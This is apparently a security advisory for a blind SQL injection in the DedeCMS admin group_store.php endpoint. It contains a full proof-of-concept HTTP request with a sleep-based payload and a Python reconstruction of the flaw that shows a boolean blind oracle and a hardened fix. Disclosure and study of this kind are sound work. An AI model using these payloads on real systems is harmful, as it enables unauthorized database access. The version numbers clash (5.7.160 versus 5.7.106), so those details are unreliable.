CVE-2023-27707: DedeCMS V5.7.160 Backend Blind SQL Injection

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dede/group_store.php endpoint.


Description

Blind SQL injection in the admin backend's group store handler (/dede/group_store.php) via POST parameters.

Affected Version

DedeCMS <= 5.7.160

POC

  1. Log in to the admin backend management interface.
  2. Send a request to /dede/group_store.php with the GET parameter action=uprank and the POST parameter rank_1=1'+and+sleep(3)+and+'1 (the + signs are URL-encoded spaces). If the response is delayed by roughly three seconds, MySQL evaluated the injected sleep(3): a time-based blind SQL injection.
  3. In the source code of /dede/group_store.php, when the GET parameter action is uprank, every POST field whose key contains rank_ is joined directly into the UPDATE statement, so the attacker controls part of the SQL. The resulting statement is passed to mysqli_query, which for an UPDATE returns only a boolean rather than a result set; no query output reaches the response, so the injection is blind and must be confirmed through a side channel such as the delay introduced by sleep().

Full POC request:

POST /cms/dedecms/dede/group_store.php?action=uprank HTTP/1.1
Host: 192.168.0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; _csrf_name_273c7533=e59946ea73ad488a9da6a03897480ac5; _csrf_name_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV_GOBACK_URL=%2Fcms%2Fdedecms%2Fdede%2Fgroup_store.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

rank_1=1'+and+sleep(3)+and+'1
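The following Python is an added example, not DedeCMS code and not part of the original advisory. It reconstructs the concatenation pattern described in step 3 (the text after rank_ taken as the group id, the raw POST value spliced into an UPDATE) against an in-memory SQLite table whose name and columns are assumptions, decodes the advisory's request body to show what the + signs become, and places a parameterized, integer-checked version beside it. SQLite has no sleep(), so the blind oracle is shown in its boolean form: the same 1' and (...) and '1 payload shape makes the stored rank 1 or 0 depending on whether the injected condition is true, which is the mechanism by which MySQL would evaluate sleep(3).

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed fixture. Table and column names are assumptions for this
# example, not DedeCMS's real schema.
SEED_ROWS = [(1, "guest", 10), (2, "member", 20), (3, "vip", 30)]

# Payload exactly as it appears in the advisory's request body.
PAGE_BODY = "rank_1=1'+and+sleep(3)+and+'1"


def make_db():
    """In-memory SQLite stand-in for the MySQL table behind group_store.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member_group (id INTEGER PRIMARY KEY, name TEXT, rank INTEGER)")
    conn.executemany("INSERT INTO member_group VALUES (?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def decode_body(body):
    """Decode an application/x-www-form-urlencoded body; '+' becomes a space."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def build_vulnerable_sql(key, value):
    """The concatenation pattern the advisory describes: the part of the key
    after 'rank_' is the group id and the raw POST value is spliced into the
    UPDATE. Reconstruction of the pattern, not DedeCMS source."""
    gid = key.split("rank_", 1)[1]
    return f"UPDATE member_group SET rank='{value}' WHERE id='{gid}'"


def vulnerable_uprank(conn, post):
    """Run the concatenated UPDATE for every rank_* field. As with mysqli_query
    on an UPDATE, nothing from the query result reaches the caller."""
    for key, value in post.items():
        if "rank_" in key:
            conn.execute(build_vulnerable_sql(key, value))
    conn.commit()


def hardened_uprank(conn, post):
    """Fixed variant: id and rank must be integers and are bound as parameters,
    so the value can never become SQL. Returns the number of rows updated."""
    updates = []
    for key, value in post.items():
        if not key.startswith("rank_"):
            continue
        gid = int(key[len("rank_"):])      # ValueError unless the suffix is an integer
        updates.append((int(value), gid))  # ValueError on "1' and sleep(3) and '1"
    cur = conn.executemany("UPDATE member_group SET rank=? WHERE id=?", updates)
    conn.commit()
    return cur.rowcount


def rank_of(conn, gid):
    return conn.execute("SELECT rank FROM member_group WHERE id=?", (gid,)).fetchone()[0]


def oracle_payload(condition):
    """Same shape as the page's payload, but SQLite has no sleep(): the stored
    rank becomes 1 when `condition` is true and 0 when it is false."""
    return f"1' and ({condition}) and '1"


if __name__ == "__main__":
    print(decode_body(PAGE_BODY))
    print(build_vulnerable_sql("rank_1", decode_body(PAGE_BODY)["rank_1"]))
    conn = make_db()
    vulnerable_uprank(conn, {"rank_1": oracle_payload("(select count(*) from member_group) = 3")})
    print("true condition  -> rank of group 1:", rank_of(conn, 1))
    vulnerable_uprank(conn, {"rank_1": oracle_payload("(select count(*) from member_group) = 4")})
    print("false condition -> rank of group 1:", rank_of(conn, 1))
```

The hardened handler rejects the advisory's payload before any query runs, because int() refuses it; the whitelist on the key prefix and the integer cast on the suffix close the second injection point (the id taken from the key name), which the original pattern also leaves unvalidated.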

Reference

Reported by Srpopty; the vulnerability was discovered using Corax.
